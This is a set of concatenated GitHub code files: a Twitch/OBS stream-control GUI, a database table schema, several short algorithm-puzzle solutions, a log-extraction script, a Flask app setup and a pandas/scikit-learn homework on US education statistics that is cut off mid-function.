font=(\"Helvetica\", 15), size=(30, 1),\n password_char='*')],\n [sg.Text('OBS Websocket Host: ', font=(\"Helvetica\", 15)),\n sg.InputText(key='obs_websocket_host', font=(\"Helvetica\", 15), size=(30, 1))],\n [sg.Text('OBS Websocket Port: ', font=(\"Helvetica\", 15)),\n sg.InputText(key='obs_websocket_port', font=(\"Helvetica\", 15), size=(30, 1))],\n [sg.Text('OBS Poll Address: ', font=(\"Helvetica\", 15)),\n sg.InputText(key='obs_poll_address', font=(\"Helvetica\", 15), size=(20, 1))],\n [sg.Button('Login', font=\"Helvetica\", key='bot_login', button_color=('white', 'green'))],\n ], vertical_alignment='center', element_justification='center')],\n [sg.Button('Exit', font=\"Helvetica\", key='Exit_1', button_color=('white', 'red'),\n border_width=3)]\n ], justification='center', vertical_alignment='center', element_justification='center')]\n ]\n\n\ndef remove_temp_files():\n if os.path.exists(ACCEPT_INPUT_FILE):\n os.remove(ACCEPT_INPUT_FILE)\n if os.path.exists(RANDOM_ACTIONS_FILE):\n os.remove(RANDOM_ACTIONS_FILE)\n\n\nOBS_HOST = \"\"\nOBS_PORT = None\nOBS_WEBSERVER = \"\"\n\n\ndef set_values(host, port, webserver):\n global OBS_HOST, OBS_PORT, OBS_WEBSERVER\n OBS_HOST = host\n OBS_PORT = port\n OBS_WEBSERVER = 
webserver\n\n\ndef is_obs_running():\n for proc in psutil.process_iter():\n try:\n if proc.name().lower() == 'obs64.exe':\n return True\n except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\n pass\n return False\n\n\ndef is_gba_emulator_running():\n for proc in psutil.process_iter():\n try:\n if proc.name().lower() == 'visualboyadvance-m.exe':\n return True\n except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\n pass\n return False\n\n\ndef check_login_values(values):\n if values['bot_username'] == '':\n return False\n elif values['bot_oauth'] == '':\n return False\n elif values['twitch_api_client_id'] == '':\n return False\n elif values['twitch_api_client_secret'] == '':\n return False\n elif values['obs_websocket_host'] == '':\n return False\n elif values['obs_websocket_port'] == '':\n return False\n elif values['obs_poll_address'] == '':\n return False\n return True\n\n\nclass GUI:\n config: ConfigDict\n credentials: CredentialDict\n channel_set: set[str]\n\n def __init__(self):\n \"\"\"\n Here is the list of layouts that are used in the GUI\n \"\"\"\n self.status_panel_thread = threading.Thread(target=self.update_status_panel, args=())\n self.status_panel_thread.daemon = True\n\n self.current_layout = None # Current used layout\n self.layout_list = [] # List of all layouts\n ##########################################################\n '''\n Here is the list of variables that are used in the GUI\n '''\n\n self.input_server_started = False\n self.input_server_process = None\n self.stream_chat_wars_started = False\n self.stream_chat_wars_process = None\n self.obs_hook = None\n ##########################################################\n sg.theme('DarkAmber')\n sg.set_options(font=(\"Helvetica\", 15))\n sg.theme_input_background_color('black')\n sg.theme_input_text_color('white')\n\n self.load_layouts()\n self.current_layout = 'Main'\n self.__main__()\n\n def load_layouts(self):\n self.layout_list = [[sg.Column(main_layout(), key=f'-COL_Main-'),\n sg.Column(stream_chat_wars_layout(), visible=False, key=f'-COL_Stream_Chat_Wars-'),\n sg.Column(chat_picks_layout(), visible=False, key=f'-COL_Chat_Picks-'),\n sg.Column(login_layout(), visible=False, key=f'-COL_Login-')]\n ]\n\n def __main__(self):\n self.window = sg.Window('Stream Extensions', self.layout_list, size=(800, 700), finalize=True,\n icon='userinterface/icon.ico')\n self.status_panel_thread.start()\n\n self.check_twitch_credentials() # Check if twitch credentials are present\n # self.validate_credentials() # Validate Twitch Credentials\n\n while True:\n event, values = self.window.read(timeout=1000)\n if event == sg.WIN_CLOSED or event == 'exit' or event == 'Exit' or event == 'Exit_1': # Exit\n print('Shutting down...')\n print('Closing all processes...')\n if self.stream_chat_wars_started:\n print('Stopping Stream Chat Wars Server...')\n self.stop_stream_chat_wars_server()\n print('Stream Chat Wars Server Stopped')\n if self.input_server_started:\n print('Stopping Input Server...')\n self.stop_input_server()\n print('Input Server Stopped')\n if self.obs_hook is not None:\n print('Disconnecting from OBS...')\n self.obs_hook.close_connection()\n print('Disconnected from OBS')\n print('Removing temporary files...')\n remove_temp_files()\n print('Exiting...')\n exit(0)\n elif event == 'Menu' or event == 'Main_Menu': # Main Menu\n self.update_current_layout('Main')\n pass\n elif event == 'chat_picks': # Chat Picks\n self.update_current_layout('Chat_Picks')\n elif event == 'bot_login': # Twitch 
Login\n if check_login_values(values):\n self.set_new_credentials(values)\n elif event == 'start_webserver':\n # if not is_obs_running():\n # sg.popup('OBS is not running, please start OBS first')\n # pass\n # else:\n self.obs_hook = obsplugin.start_connection()\n self.window['selected_scene'].update(values=self.obs_hook.get_obs_scenes(), value='none')\n if not self.obs_hook.is_obs_setup():\n self.window['obs_setup'].update(visible=True)\n self.window['controls'].update(visible=False)\n else:\n self.window['obs_setup'].update(visible=False)\n self.window['controls'].update(visible=True)\n self.window['scene_setup'].update(self.obs_hook.get_scene())\n elif event == 'stop_webserver':\n if self.obs_hook is not None:\n self.stop_obs_server()\n elif event == 'reset_credentials':\n os.remove(DEFAULT_CREDENTIAL_FILE)\n self.check_twitch_credentials()\n elif event == 'test_button':\n if self.obs_hook is not None:\n self.obs_hook.test_function()\n elif event == 'setup_obs':\n if values['selected_scene'] != 'none' and values['streamer_name'] != '':\n self.obs_hook.setup_obs(values['selected_scene'], values['streamer_name'])\n self.window['obs_setup'].update(visible=False)\n self.window['controls'].update(visible=True)\n self.window['scene_setup'].update(self.obs_hook.get_scene())\n elif event == 'go_to_scene':\n self.obs_hook.swap_to_scene()\n elif event == 'set_visible':\n if self.obs_hook is not None:\n self.obs_hook.set_scene_visibity(True, self.obs_hook.image_source_name)\n elif event == 'set_invisible':\n if self.obs_hook is not None:\n self.obs_hook.set_scene_visibity(False, self.obs_hook.image_source_name)\n elif event == 'show_poll':\n if self.obs_hook is not None:\n self.obs_hook.set_scene_visibity(True, self.obs_hook.poll_source_name)\n elif event == 'hide_poll':\n if self.obs_hook is not None:\n self.obs_hook.set_scene_visibity(False, self.obs_hook.poll_source_name)\n elif event == 'upload_image':\n self.obs_hook.set_image(values['-FILEIN-'])\n elif event == 'clear_image':\n self.obs_hook.set_image('')\n elif event == 'enable_poll':\n self.obs_hook.enable_poll()\n elif event == 'disable_poll':\n self.obs_hook.disable_poll()\n elif event == 'reset_poll':\n self.obs_hook.reset_poll()\n elif event == 'remove_sources':\n self.obs_hook.remove_sources()\n self.window['obs_setup'].update(visible=True)\n self.window['controls'].update(visible=False)\n elif event == 'stream_chat_wars': # Stream Chat Wars\n self.update_current_layout('Stream_Chat_Wars')\n elif event == 'start_input_server': # Start Input Server\n self.start_input_server()\n elif event == 'stop_input_server': # Stop Input Server\n self.stop_input_server()\n elif event == 'start_stream_chat_wars': # Start Stream Chat Wars\n self.start_stream_chat_wars_server(values)\n elif event == 'stop_stream_chat_wars': # Stop Stream Chat Wars\n self.stop_stream_chat_wars_server()\n elif event == 'accept_chat_input_on': # Start Chat Input\n if not os.path.exists(ACCEPT_INPUT_FILE):\n print('Enabling Chat Input')\n open(ACCEPT_INPUT_FILE, 'x')\n elif event == 'accept_chat_input_off': # Stop Chat Input\n if os.path.exists(ACCEPT_INPUT_FILE):\n print('Disabling Chat Input')\n os.remove(ACCEPT_INPUT_FILE)\n elif event == 'random_inputs_on': # Random Inputs\n print('Enabling Random Inputs')\n if not os.path.exists(RANDOM_ACTIONS_FILE):\n open(RANDOM_ACTIONS_FILE, 'x')\n elif event == 'random_inputs_off': # Random Inputs\n print('Disabling Random Inputs')\n if os.path.exists(RANDOM_ACTIONS_FILE):\n os.remove(RANDOM_ACTIONS_FILE)\n elif event == 
'reset_teams': # Reset Teams\n print('Resetting Teams')\n pydirectinput.press(self.config.get(\"events\").get(\"hotkeys\").get(\"reset_teams\", 'F15').lower())\n\n def start_input_server(self):\n if not self.input_server_started:\n print('Starting Input Server...')\n self.input_server_process = subprocess.Popen('python -m input_server'.split(),\n stderr=subprocess.PIPE)\n else:\n sg.popup('Input Server already started.')\n\n def stop_input_server(self):\n if self.input_server_started:\n print('Stopping Input Server...')\n subprocess.call(['taskkill', '/F', '/T', '/PID', str(self.input_server_process.pid)])\n else:\n sg.popup('Input Server not started.')\n\n def start_stream_chat_wars_server(self, values):\n if self.input_server_started:\n if not self.stream_chat_wars_started:\n game = values['selected_game']\n if game != 'none':\n selected_config = games.get_selected_game_config(game)\n self.config, self.credentials = read_json_configs(selected_config)\n print('Starting Stream Chat Wars for ' + game + '...')\n self.stream_chat_wars_process = subprocess.Popen(\n ['python', '-m', 'streamchatwars', selected_config],\n stdin=subprocess.PIPE)\n\n if game == games.GAME_POKEMON_FIRE_RED['name']:\n if not is_gba_emulator_running():\n os.startfile(\"userinterface\\\\pokemon\\\\Pokemon_FireRed.gba\")\n else:\n sg.popup('Please select a game to run Chat Plays for.')\n else:\n sg.popup('Please start the Input Server first.')\n\n def stop_stream_chat_wars_server(self):\n if self.stream_chat_wars_started:\n print('Stopping Stream Chat Wars...')\n subprocess.call('taskkill /F /T /PID ' + str(self.stream_chat_wars_process.pid))\n self.window['stream_chat_wars_status'].update('Stopped', text_color='red')\n else:\n sg.popup('Chat Plays not started.')\n\n def update_current_layout(self, layout):\n self.window[f'-COL_{self.current_layout}-'].update(visible=False)\n self.current_layout = layout\n self.window[f'-COL_{self.current_layout}-'].update(visible=True)\n\n def check_process_state(self): # Check if the servers are running\n if self.input_server_started: # Check if the Input Server is running\n if self.input_server_process.poll() is None:\n print('Input Server is running.')\n else:\n print(self.input_server_process.poll())\n print('Input Server is not running.')\n\n if self.stream_chat_wars_started: # Check if the Stream Chat Wars is running\n if self.stream_chat_wars_process.poll() is None:\n print('Stream Chat Wars is running.')\n else:\n print(self.stream_chat_wars_process.poll())\n print('Stream Chat Wars is not running.')\n\n def check_twitch_credentials(self):\n config_arg: str | None = sys.argv[1] if len(sys.argv) > 1 else None\n credentials_arg: str | None = sys.argv[2] if len(sys.argv) > 2 else None\n try:\n self.config, self.credentials = read_json_configs(config_arg, credentials_arg)\n print(\"Credentials file exists, checking credentials...\")\n self.validate_credentials()\n except (OSError, JSONDecodeError, ValidationError):\n self.config, self.credentials = read_json_configs()\n self.update_current_layout('Login')\n # sg.popup(\"Invalid Twitch Chat credentials found. Go yell at thundercookie15 to send you new ones.\")\n\n def validate_credentials(self) -> None | bool:\n chat_credentials: TwitchChatCredentialDict | None\n chat_credentials = self.credentials.get(\"TwitchChat\", None)\n\n if not chat_credentials:\n print(\"No Twitch chat credentials provided.\")\n sg.popup(\"No Twitch Chat credentials found. 
Go yell at thundercookie15 to send you new ones.\")\n            return False\n        try:\n            self.channel_set: set[str] = set()\n            for team in GlobalData.Teams.get_all_teams():\n                self.channel_set.update(team.channels)\n            irc_setting: IRC_Settings = extract_irc_settings(self.config, chat_credentials, self.channel_set)\n            username = irc_setting.username\n            oauth = irc_setting.oauth_token\n            host = self.credentials.get(\"OBS\", {}).get(\"host\").get(\"value\")\n            port = self.credentials.get(\"OBS\", {}).get(\"port\").get(\"value\")\n            webserver = self.credentials.get(\"OBS\", {}).get(\"webserver\").get(\"value\")\n            if username == \"YOUR_BOT_USERNAME_LOWERCASE\" or oauth == \"YOUR_BOT_OAUTH_TOKEN\":\n                raise InvalidCredentialsError\n            set_values(host, port, webserver)\n            print('Credentials validated...')\n            self.update_current_layout('Main')\n            return True\n        except InvalidCredentialsError:\n            sg.popup(\"Invalid Twitch Chat credentials found. Go yell at thundercookie15 to send you new ones.\")\n            self.update_current_layout('Login')\n            return False\n\n    def set_new_credentials(self, values):\n        username = values['bot_username']\n        oauth = values['bot_oauth']\n        client_id = values['twitch_api_client_id']\n        client_secret = values['twitch_api_client_secret']\n        obs_host = values['obs_websocket_host']\n        obs_port = values['obs_websocket_port']\n        obs_poll_address = values['obs_poll_address']\n        self.credentials.get(\"TwitchChat\").get(\"username\").update({\"value\": username})\n        self.credentials.get(\"TwitchChat\").get(\"oauth_token\").update({\"value\": oauth})\n        self.credentials.get(\"TwitchAPI\").get(\"client_id\").update({\"value\": client_id})\n        self.credentials.get(\"TwitchAPI\").get(\"client_secret\").update({\"value\": client_secret})\n        self.credentials.get(\"OBS\").get(\"host\").update({\"value\": obs_host})\n        self.credentials.get(\"OBS\").get(\"port\").update({\"value\": obs_port})\n        self.credentials.get(\"OBS\").get(\"webserver\").update({\"value\": obs_poll_address})\n        json_utils.write_credentials_file(self.credentials, DEFAULT_CREDENTIAL_FILE)\n        self.check_twitch_credentials()\n\n    def update_status_panel(self):\n        while True:\n            if self.current_layout == 'Chat_Picks':\n                if self.obs_hook is not None:\n                    if self.obs_hook.is_obs_setup():\n                        if self.obs_hook.get_poll_status().get('active'):\n                            self.window['poll_status_text'].update('Active', text_color='green')\n                        else:\n                            self.window['poll_status_text'].update('Inactive', text_color='red')\n                        if self.obs_hook.get_current_scene() != self.obs_hook.get_scene():\n                            self.window['go_to_scene'].update(visible=True)\n                        else:\n                            self.window['go_to_scene'].update(visible=False)\n                        self.window['scene_text'].update(self.obs_hook.get_current_scene())\n            if self.current_layout == 'Stream_Chat_Wars':\n                if self.input_server_process is not None:\n                    if self.input_server_process.poll() is None:\n                        self.input_server_started = True\n                    else:\n                        self.input_server_started = False\n                    if self.input_server_started:\n                        self.window['input_status'].update('Running', text_color='green')\n                    else:\n                        self.window['input_status'].update('Stopped', text_color='red')\n\n                # Stream Chat Wars status\n                if self.stream_chat_wars_process is not None:\n                    if self.stream_chat_wars_process.poll() is None:\n                        self.stream_chat_wars_started = True\n                    else:\n                        self.stream_chat_wars_started = False\n                    if self.stream_chat_wars_started:\n                        self.window['chat_input'].update('On' if os.path.exists(ACCEPT_INPUT_FILE) else 'Off',\n                                                         text_color='green' if os.path.exists(ACCEPT_INPUT_FILE) else 'red')\n                        self.window['random_inputs'].update('On' if 
os.path.exists(RANDOM_ACTIONS_FILE) else 'Off',\n text_color='green' if os.path.exists(RANDOM_ACTIONS_FILE) else\n 'red')\n self.window['stream_chat_wars_status'].update(\n 'Running' if self.stream_chat_wars_process.poll() is None\n else 'Failed to start', text_color='green'\n if self.stream_chat_wars_process.poll() is None else 'red')\n hotkeys = self.config.get(\"events\").get(\"hotkeys\")\n self.window['failsafe_hotkey'].update(f'{hotkeys.get(\"failsafe\", \"Shift+Backspace\")}')\n self.window['chat_input_hotkey'].update(f'{hotkeys.get(\"accept_input\", \"F13\")}')\n self.window['random_inputs_hotkey'].update(f'{hotkeys.get(\"random_action\", \"F14\")}')\n self.window['reset_teams_hotkey'].update(f'{hotkeys.get(\"reset_teams\", \"F15\")}')\n if not self.stream_chat_wars_started:\n self.window['stream_chat_wars_status'].update('Stopped', text_color='red')\n\n if self.input_server_started:\n self.window['input_status'].update('Running' if self.input_server_process.poll() is None else\n 'Failed to start', text_color='green' if\n self.input_server_process.poll() is None else 'red')\n if not self.input_server_started:\n self.window['input_status'].update('Stopped', text_color='red')\n\n self.window.refresh()\n\n def stop_obs_server(self):\n self.obs_hook.close_connection()\n self.obs_hook = None\n self.window['obs_setup'].update(visible=False)\n self.window['controls'].update(visible=False)\n","repo_name":"ReggX/SayuPanel","sub_path":"userinterface/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":36359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"72531866749","text":"\"\"\"\n Defines specific services/group ID specifications\n\n A group X may have special specifications defined when running a jupyter-lab-math\n for example that should run on a specific machine.\n\n\"\"\"\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects.postgresql import JSONB\n\nfrom .base import metadata\n\nservices_specifications = sa.Table(\n \"services_specifications\",\n metadata,\n sa.Column(\n \"service_key\",\n sa.String,\n nullable=False,\n doc=\"Service Key Identifier\",\n ),\n sa.Column(\n \"service_version\",\n sa.String,\n nullable=False,\n doc=\"Service version\",\n ),\n sa.Column(\n \"gid\",\n sa.BigInteger,\n sa.ForeignKey(\n \"groups.gid\",\n name=\"fk_services_specifications_gid_groups\",\n onupdate=\"CASCADE\",\n ondelete=\"CASCADE\",\n ),\n doc=\"Group Identifier\",\n ),\n sa.Column(\n \"sidecar\",\n JSONB,\n nullable=True,\n doc=\"schedule-time specifications for the service sidecar (follows Docker Service creation API, see https://docs.docker.com/engine/api/v1.25/#operation/ServiceCreate)\",\n ),\n sa.Column(\n \"service\",\n JSONB,\n nullable=True,\n doc=\"schedule-time specifications for the service (follows Docker Service creation API, see https://docs.docker.com/engine/api/v1.41/#tag/Service/operation/ServiceCreate\",\n ),\n # If service-key/version gets deleted from service_metadata, it should be deleted from here\n sa.ForeignKeyConstraint(\n [\"service_key\", \"service_version\"],\n [\"services_meta_data.key\", \"services_meta_data.version\"],\n onupdate=\"CASCADE\",\n ondelete=\"CASCADE\",\n ),\n # This table stores services (key:version) that consume filetype by AT LEAST one input_port\n # if more ports can consume, then it should only be added once in this table\n sa.PrimaryKeyConstraint(\n \"service_key\",\n \"service_version\",\n \"gid\",\n name=\"services_specifications_pk\",\n 
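# composite primary key: at most one specification row per (service_key, service_version, gid)\n    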
),\n)\n","repo_name":"ITISFoundation/osparc-simcore","sub_path":"packages/postgres-database/src/simcore_postgres_database/models/services_specifications.py","file_name":"services_specifications.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"6"}
+{"seq_id":"20822366090","text":"import sys\n\nCAMINO = []\nMAX = 1\nULTIMO = 1\nULTIMA_FILA = 0\nULTIMA_COLUMNA = 0\nRESULTADOS = []\nMAZES = []\n\ndef read_line():\n    line = next(sys.stdin).strip()\n    if not line:\n        return \"\"\n    while(len(line) == 0):\n        line = next(sys.stdin).strip()\n    return line\n\ndef posibles_movimientos(ultimo, x, y, visitados):\n    global ULTIMA_FILA, ULTIMA_COLUMNA\n    posibles = []\n    # I do this because otherwise, when standing at the end, it gives me the adjacent cell as a possible move\n    if x == ULTIMA_FILA:\n        return posibles\n    if x+1 <= ULTIMA_FILA and G[x+1][y] == ultimo and not (x+1, y) in visitados:\n        posibles.append((x+1, y))\n    if x-1 >= 1 and G[x-1][y] == ultimo and not (x-1, y) in visitados:\n        posibles.append((x-1, y))\n    if y+1 <= ULTIMA_COLUMNA and G[x][y+1] == ultimo and not (x, y+1) in visitados:\n        posibles.append((x, y+1))\n    if y-1 >= 1 and G[x][y-1] == ultimo and not (x, y-1) in visitados:\n        posibles.append((x, y-1))\n    return posibles\n\n\ndef backtracking(ultimo, x, y, max, visitados=[]):\n    global RESULTADOS\n    # If I reached the end and the current result is not yet in the results list\n    if x == ULTIMA_FILA and (INICIO[0], INICIO[1], x, y) not in RESULTADOS:\n        RESULTADOS.append((INICIO[0], INICIO[1], x, y))\n        return\n    \"\"\"\n    * Here I determine whether I have to restart the counter\n     or keep increasing it\n    \"\"\"\n    # If the last number I passed through equals the maximum\n    if ultimo == max:\n        # Increase the maximum\n        max += 1\n        # Reset the counter to 1\n        ultimo = 1\n    else:\n        # Otherwise, it means I haven't reached the maximum yet, so I keep increasing\n        ultimo += 1\n    for i, j in posibles_movimientos(ultimo, x, y, visitados):\n        visitados.append((i, j))\n        backtracking(ultimo, i, j, max, visitados)\n        visitados.remove((i, j))\n\nif __name__ == \"__main__\":\n    cases = int(read_line())\n    for i in range(0, cases):\n        G = {}\n        blank = read_line()#blank\n        filas, columnas = map(int, read_line().split(\" \"))\n        RESULTADOS = []\n        ULTIMA_FILA = filas\n        ULTIMA_COLUMNA = columnas\n        for i in range(1, filas+1):\n            fila = read_line().split(\" \")\n            G[i] = {}\n            for j in range(1, columnas+1):\n                G[i][j] = int(fila[j-1])\n        for i in G[1]:\n            if G[1][i] == 1:\n                INICIO = (1, i)\n                backtracking(1, 1, i, 1) # ultimo, x, y, maximo\n        minimo = ()\n        for ix, iy, fx, fy in RESULTADOS:\n            # Set the first one\n            if not minimo:\n                minimo = (ix, iy, fx, fy)\n            else:\n                # If the current start is lexicographically further left than the minimum,\n                # or the start is lexicographically equal but the end is further left\n                if iy < minimo[1] or (iy == minimo[1] and fy < minimo[3]) and G[fx][fy] >= G[minimo[2]][minimo[3]]:\n                    # It becomes the current minimum\n                    minimo = (ix, iy, fx, fy)\n        MAZES.append(minimo)\n        # If I don't do this, I get a presentation error\n        for maze in MAZES[:-1]:\n            print(maze[0], maze[1])\n            print(maze[2], maze[3])\n            print(\"\")\n        print(MAZES[-1][0], MAZES[-1][1])\n        print(MAZES[-1][2], MAZES[-1][3])\n","repo_name":"nachoyegro/algoritmosunq","sub_path":"868.py","file_name":"868.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
+{"seq_id":"23922830137","text":"'''\nCarpet\n\nConstraints\n- The number of brown cells, 
brown, is a natural number between 8 and 5,000 inclusive.\n- The number of yellow cells, yellow, is a natural number between 1 and 2,000,000 inclusive.\n- The carpet's width is equal to or longer than its height.\n\nExample input/output\nbrown\tyellow\treturn\n10\t2\t[4, 3]\n8\t1\t[3, 3]\n24\t24\t[8, 6]\n'''\n\ndef solution(brown, yellow):\n    divisor = brown + yellow\n    answer_list = []\n    \n    for i in range(1, divisor + 1):\n        if divisor % i == 0:\n            answer_list.append([divisor // i, i])\n\n    for answers in answer_list:\n        if answers[0] >= answers[1]:\n            if (answers[0] - 2) * (answers[1] - 2) == yellow:\n                answer = answers\n    \n    return answer\n\n'--------'\n\nimport math\n\n\ndef solution1(brown, yellow):\n    '''other solution'''\n    ans = ((brown - 4) + math.sqrt((brown - 4) ** 2 - 16 * yellow)) // 4\n    return [ans + 2, yellow // ans + 2]\n\n\nif __name__ == \"__main__\":\n    print(solution(10, 2))\n    print(solution1(10, 2))","repo_name":"datajobbu/Algorithms","sub_path":"programmers/lv2_210302_03.py","file_name":"lv2_210302_03.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"39134944377","text":"# Four Squares\n# Source: https://donghak-dev.tistory.com/49\nn = int(input())\n\n# dp[i]: the minimum number of square numbers whose sum equals i\ndp = [0] * 50001\ndp[0] = 0\ndp[1] = 1\n\nfor i in range(2, n + 1):\n    min_val = int(1e9)\n    j = 1\n    # Key idea: dp[i] = (minimum of dp[i - s] over square numbers s <= i) + 1\n    while (j**2) <= i:\n        min_val = min(min_val, dp[i - (j**2)])\n        j += 1\n    dp[i] = min_val + 1\n\nprint(dp[n])\n\n\"\"\"\n- Difficulty: Silver 3\n- Category: dp\n\n- ex. dp[9] = min(dp[9 - 1^2], dp[9 - 2^2], dp[9 - 3^2]) + 1\n            = min(dp[8], dp[5], dp[0]) + 1\n            = 0 + 1\n            = 1\n\"\"\"\n","repo_name":"yg-moon/problem-solving","sub_path":"baekjoon/class/3/3++/17626.py","file_name":"17626.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"}
+{"seq_id":"24611386809","text":"import re, os, sys, pickle\n\nfout = open(\"/local/datdb/deepgo/data/train/fold_1/DeepGOFlatSeqProtHwayGoNotUsePPI.test.txt\",\"w\")\nname_list = 'GCN Onto2vec BertGOName BiLSTM Bertd11d12 BertAve12 UniformGOVector BertCLS12 BertAsService'.split()\nfor name in name_list: # 'BiLSTM', 'Bertd11d12', 'GCN', 'BertAve12' Base\n    # write out results so we can paste into Excel\n    for onto in ['bp','mf','cc']: \n        try:\n            fin = open(\"/local/datdb/deepgo/data/train/fold_1/DeepGOFlatSeqProtHwayGoNotUsePPI\"+name+\"/NotNormalize/\"+onto+\"b32lr0.0005RMSprop/test_frequency.log\",\"r\")\n        except OSError:\n            continue\n        print('\\nmethod {} ontology {}\\n'.format(name,onto))\n        fout.write('\\nmethod {} ontology {}\\n'.format(name,onto))\n        do_print = False\n        for line in fin:\n            if ('[MACRO]' in line) or ('fmax' in line): \n                do_print = True ## turn on printing\n            if ('rec_at_' in line) or ('macro average' in line): \n                do_print = False\n            if do_print: \n                fout.write(line)\n        fin.close()\n\nfout.close()\n","repo_name":"datduong/EncodeGeneOntology","sub_path":"EvaluateLabelType/ExtractAucPrintout.py","file_name":"ExtractAucPrintout.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"47"}
+{"seq_id":"12310694691","text":"from flask import Flask, url_for, redirect\nfrom config import DevConfig, TestConfig\nfrom src.models import db, User, migrate\nfrom flask_login import LoginManager\nfrom src.cli import COMMANDS\nfrom src.log_config import log_config\nfrom src.routes import api, api_bp\n\nLOG_MGR = LoginManager()\n\n\ndef register_blueprint(app):\n    app.register_blueprint(COMMANDS)\n    
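# COMMANDS carries the CLI blueprint; the REST API blueprint is registered next\n    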
app.register_blueprint(api_bp)\n\n\ndef create_app():\n app = Flask(__name__)\n if app.config[\"ENV\"] == \"development\":\n app.config.from_object(DevConfig)\n if app.config[\"ENV\"] == \"testing\":\n app.config.from_object(TestConfig)\n LOG_MGR.init_app(app)\n LOG_MGR.login_view = \"/Login\"\n db.init_app(app)\n migrate.init_app(app, db)\n with app.app_context():\n db.create_all()\n api.init_app(app)\n log_config(app)\n register_blueprint(app)\n\n @LOG_MGR.user_loader\n def load_user(id_):\n return User.query.filter_by(id=id_).first()\n\n @LOG_MGR.unauthorized_handler\n def unauthorized():\n return redirect(url_for(endpoint=\"authentication\"))\n\n return app\n","repo_name":"Yurasblv/final_proj","sub_path":"src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13580213226","text":"# Madison Hess\n# CSE 163\n# Homework 3\n# The following program takes in a data set containing years, sex, education\n# attainment and the relative percentages for the population percentages given\n# the previous classifications. The following program explores relationships\n# over time, across different sexes, and different degree types in the effort\n# to gain insights related to education trends across different groups.\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import tree\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\nimport seaborn as sns\nsns.set()\n\n# Part 0 - Statistical Functions using Pandas\n\n\ndef completions_between_years(df, year1, year2, sex):\n \"\"\"\n Takes in a dataframe, a starting and ending year, and sex and returns a\n dataframe which shows the education attainment across different racial\n groups as well as the whole population (given other restrictions) between\n the specified years.\n \"\"\"\n df = df[(df['Sex'] == sex) & (df['Year'] >= year1) & (df['Year'] < year2)]\n return df\n\n\ndef compare_bachelors_1980(df):\n \"\"\"\n Takes in a dataframe and returns a tuple containing the total percentage\n of males and females, respectively, who at least attained a bachelor's\n degree in 1980.\n \"\"\"\n df = df[(df['Year'] == 1980) & (df['Min degree'] == \"bachelor's\")]\n df = df[(df['Sex'] == 'M') | (df['Sex'] == 'F')]\n df = df[['Sex', 'Total']]\n return tuple(list(df['Total']))\n\n\ndef top_2_2000s(df):\n \"\"\"\n Takes in a dataframe and returns the two most commonly attained degree\n types and the relative average percentage that attained that type for the\n whole population between 2000 and 2010.\n \"\"\"\n df = df[(df['Year'] >= 2000) & (df['Year'] <= 2010) & (df['Sex'] == 'A')]\n df = df.groupby('Min degree')['Total'].mean()\n result = df.nlargest(2)\n return list(result.items())\n\n\ndef percent_change_bachelors_2000s(df, sex='A'):\n \"\"\"\n Takes in a dataframe and an optional sex variable (which defaults to all if\n unspecified) and returns the percent change in bachelor's degree attainment\n for that sex between 2000 and 2010.\n \"\"\"\n df = df[(df['Sex'] == sex)]\n df_00 = df[(df['Year'] == 2000)\n & (df['Min degree'] == \"bachelor's\")].Total.item()\n df_10 = df[(df['Year'] == 2010)\n & (df['Min degree'] == \"bachelor's\")].Total.item()\n return (df_10 - df_00)\n\n\n# Plotting with seaborn\n\n\ndef line_plot_bachelors(df):\n \"\"\"\n Takes in a dataframe and saves a plot to a .png file which graphically\n represents the change in bachelor's degree 
attainment for the whole\n population since the 1940s.\n \"\"\"\n df = df[(df['Sex'] == 'A') & (df['Min degree'] == \"bachelor's\")]\n sns.lineplot(x='Year', y='Total', data=df)\n plt.savefig('line_plot_bachelors.png', facecolor='w')\n\n\ndef bar_chart_high_school(df):\n \"\"\"\n Takes in a dataframe and saves a bar chart to a .png file which graphically\n represents the total, male, and female percentages of people who recieced\n a high school diploma in 2009.\n \"\"\"\n df = df[(df['Min degree'] == 'high school') & (df['Year'] == 2009)]\n df = df[['Sex', 'Total']]\n sns.catplot(x='Sex', y='Total', data=df, kind='bar')\n plt.savefig('bar_chart_high_school.png', facecolor='w')\n\n\ndef plot_hispanic_min_degrees(df):\n \"\"\"\n Takes in a dataframe and saves a line plot to a .png file which graphically\n represents the change in both percentage attainment of high school diplomas\n and bachelor's degrees amongst Hispanics from 1990 to 2010.\n \"\"\"\n df = df[(df['Year'] >= 1990) & (df['Year'] <= 2010) & (df['Sex'] == 'A')]\n df = df[(df['Min degree'] == 'high school')\n | (df['Min degree'] == \"bachelor's\")]\n df = df[['Year', 'Min degree', 'Hispanic']]\n sns.lineplot(x='Year', y='Hispanic', hue='Min degree', data=df)\n plt.xlim(1990, 2010)\n plt.savefig('plot_hispanic_min_degrees.png', facecolor='w')\n\n\n# Part 2: Machine Learning using scikit-learn\n\n\ndef fit_and_predict_degrees(df):\n \"\"\"\n Develops a simple machine learning program using decision tree regression\n and the year, sex, and min degree from our data to develop a model to\n predict the total percent attainment for each group.\n \"\"\"\n df = df.loc[:, ('Year', 'Sex', 'Min degree', 'Total')].dropna()\n X = df.loc[:, df.columns != 'Total']\n X = pd.get_dummies(X)\n y = df['Total']\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n model = tree.DecisionTreeRegressor()\n model = model.fit(X_train, y_train)\n y_train_pred = model.predict(X_train)\n 